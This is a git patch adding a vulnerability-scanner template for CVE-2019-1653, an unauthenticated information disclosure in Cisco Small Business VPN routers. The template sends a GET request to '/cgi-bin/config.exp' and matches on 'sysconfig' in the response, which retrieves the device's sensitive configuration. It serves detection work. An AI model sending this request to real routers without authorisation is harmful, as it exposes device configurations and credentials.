From 43006913e1afd4b2ff2e9e6451f5df279df31eed Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Thu, 1 Oct 2020 14:17:09 +0700 Subject: [PATCH] :fire: Add CVE-2019-1653 --- cves/CVE-2019-1653.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/CVE-2019-1653.yaml diff --git a/cves/CVE-2019-1653.yaml b/cves/CVE-2019-1653.yaml new file mode 100644 index 0000000000..3e1404907a --- /dev/null +++ b/cves/CVE-2019-1653.yaml @@ -0,0 +1,20 @@ +id: cve-2019-1653 + +info: + name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure + author: dwisiswant0 + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/config.exp" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "sysconfig" + part: body